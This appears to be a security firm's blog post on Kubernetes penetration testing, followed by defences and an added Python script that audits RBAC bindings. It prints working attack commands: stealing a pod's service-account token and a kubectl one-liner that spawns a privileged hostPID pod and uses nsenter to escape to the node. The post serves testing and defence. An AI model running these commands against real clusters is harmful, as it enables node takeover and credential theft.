Kubernetes Penetration Testing: An Attacker’s Methodology for 2026

Manish Garg
Associate of (ISC)² · RingSafe
May 25, 2026

Attackers in 2026 do not just port-scan a cluster — they speak Kubernetes. This is the attacker methodology for a Kubernetes pentest: from an initial pod foothold to cluster-admin, mapped to the commands a tester actually runs.

1. Enumerate from the foothold

Assume a compromised pod (a web app RCE is the usual entry). The first prize is the mounted service-account token:

# The kubelet mounts the token, namespace and API-server CA into every pod by default
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NS=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
CA=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Use it against the API server (in-cluster DNS name; kubectl has no kubeconfig inside a pod)
kubectl --server=https://kubernetes.default.svc --certificate-authority="$CA" \
  --token="$TOKEN" -n "$NS" auth can-i --list

auth can-i --list is the single most useful command: it tells you exactly what this identity is allowed to do. The answer is scoped to one namespace (the current one by default), so repeat it with -n for any other namespace of interest, since grants made by RoleBindings elsewhere do not show up.

2. Abuse over-permissive RBAC

Most clusters leak privilege through RBAC. High-value findings:

  • create pods → run a privileged pod that mounts the host filesystem and escape to the node.
  • get/list secrets → harvest tokens and credentials cluster-wide.
  • create pods/exec → shell into other workloads.
  • Binding to cluster-admin via an over-broad RoleBinding.

# Classic node escape: a pod that mounts the host root
kubectl run pwn --image=alpine --overrides='{"spec":{"hostPID":true,"containers":[{"name":"x","image":"alpine","securityContext":{"privileged":true},"command":["nsenter","--mount=/proc/1/ns/mnt","--","bash"]}]}}' -it

3. Admission control & the supply chain

Check whether Pod Security Admission or an OPA/Gatekeeper/Kyverno policy actually blocks privileged pods: many clusters run the policy only in audit or warn mode, which records or warns about the violation but never rejects the pod. Then look at image provenance: an attacker who can push to the registry the cluster trusts owns the cluster.

Defences

  1. Least-privilege RBAC — audit with kubectl auth can-i and tools like kubiscan/rbac-police.
  2. Enforce Pod Security Admission at restricted; block privileged and hostPath.
  3. Disable auto-mount of service-account tokens where not needed (automountServiceAccountToken: false).
  4. Network policies to stop pod-to-API and lateral movement.
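Added example (not code from the post or from RingSafe): a small Python audit that flags the section-2 RBAC findings (create pods, get/list secrets, create pods/exec, bindings to cluster-admin) in the JSON that `kubectl get clusterroles,clusterrolebindings -o json` returns; pass its `items` list to audit(). It is assumed to cover cluster-scoped objects only: namespaced Roles/RoleBindings and aggregated ClusterRoles are out of scope, and the sample dump at the bottom is constructed, not taken from a real cluster.

```python
# (resource, verb) pairs the post calls out as high-value; all live in the core API group "".
RISKY = {
    ("pods", "create"): "create pods (privileged pod, node escape)",
    ("secrets", "get"): "read secrets",
    ("secrets", "list"): "list secrets",
    ("pods/exec", "create"): "exec into other workloads",
}

def rule_grants(rule, resource, verb):
    """True if a PolicyRule grants (resource, verb), honouring '*' wildcards."""
    groups, res, verbs = (rule.get(k, []) for k in ("apiGroups", "resources", "verbs"))
    return (("" in groups or "*" in groups) and (resource in res or "*" in res)
            and (verb in verbs or "*" in verbs))

def risky_grants(role):
    """Deduplicated findings a single ClusterRole grants."""
    findings = []
    for rule in role.get("rules", []):
        for (resource, verb), why in RISKY.items():
            if rule_grants(rule, resource, verb) and why not in findings:
                findings.append(why)
    return findings

def audit(items):
    """Map (kind, namespace, name) of each bound subject to its findings; a binding
    to cluster-admin is flagged even when that ClusterRole is absent from the dump."""
    roles = {i["metadata"]["name"]: i for i in items if i["kind"] == "ClusterRole"}
    report = {}
    for b in (i for i in items if i["kind"] == "ClusterRoleBinding"):
        name = b["roleRef"]["name"]
        findings = ["bound to cluster-admin"] if name == "cluster-admin" else []
        findings += risky_grants(roles.get(name, {}))
        for s in b.get("subjects", []) if findings else []:
            seen = report.setdefault((s["kind"], s.get("namespace"), s["name"]), [])
            seen.extend(f for f in findings if f not in seen)
    return report

# Constructed sample: a CI account with create on pods and pods/exec, a read-only group, the default SA on cluster-admin.
SAMPLE = [
    {"kind": "ClusterRole", "metadata": {"name": "ci-deployer"},
     "rules": [{"apiGroups": [""], "resources": ["pods", "pods/exec"], "verbs": ["create", "get"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "viewer"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "ci"}, "roleRef": {"name": "ci-deployer"},
     "subjects": [{"kind": "ServiceAccount", "name": "ci", "namespace": "build"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "ro"}, "roleRef": {"name": "viewer"},
     "subjects": [{"kind": "Group", "name": "devs"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "oops"}, "roleRef": {"name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "default"}]},
]
```

audit(SAMPLE) reports the build/ci service account for create pods and pods/exec and the default service account for its cluster-admin binding, while the read-only devs group is not listed.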

RingSafe runs attacker-perspective Kubernetes and cloud-native pentests. See our VAPT services.
